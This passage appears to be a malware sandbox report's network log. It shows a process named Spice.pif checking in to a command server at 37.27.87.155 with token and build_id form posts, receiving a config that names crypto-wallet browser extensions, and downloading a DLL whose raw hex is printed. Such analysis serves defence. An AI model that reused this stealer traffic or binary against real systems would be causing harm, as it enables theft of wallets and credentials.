                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:43:59 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------GHDBAFIIECBFHIEBKJJKCont
                                                                                                                                                                                                                                    2024-04-30 05:44:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:00 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:00 UTC5533INData Raw: 31 35 39 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                    Data Ascii: 1590TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    5192.168.2.84971437.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:00 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAA
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 6937
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:00 UTC6937OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------IDGDAAKFHIEHIECAFBAACont
                                                                                                                                                                                                                                    2024-04-30 05:44:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:01 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    6192.168.2.84971537.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:03 UTC177OUTGET /sqln.dll HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:03 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:03 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 2459136
                                                                                                                                                                                                                                    Last-Modified: Mon, 22 Apr 2024 11:42:56 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "66264d40-258600"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    2024-04-30 05:44:03 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                    2024-04-30 05:44:03 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                    Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                                                    2024-04-30 05:44:03 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                    Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                    2024-04-30 05:44:04 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                    Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                    2024-04-30 05:44:04 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                    Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                    2024-04-30 05:44:04 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                    Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                    2024-04-30 05:44:04 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                    Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                    2024-04-30 05:44:04 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                    Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                    2024-04-30 05:44:04 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                    Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                    2024-04-30 05:44:04 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                    Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    7192.168.2.84971637.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:09 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAA
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 829
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:09 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------IDGDAAKFHIEHIECAFBAACont
                                                                                                                                                                                                                                    2024-04-30 05:44:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:09 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    8192.168.2.84971737.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:09 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIII
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 437
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:09 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------BAEBGHCFCAAFIECAFIIICont
                                                                                                                                                                                                                                    2024-04-30 05:44:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:10 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    9192.168.2.84971837.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:11 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 437
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
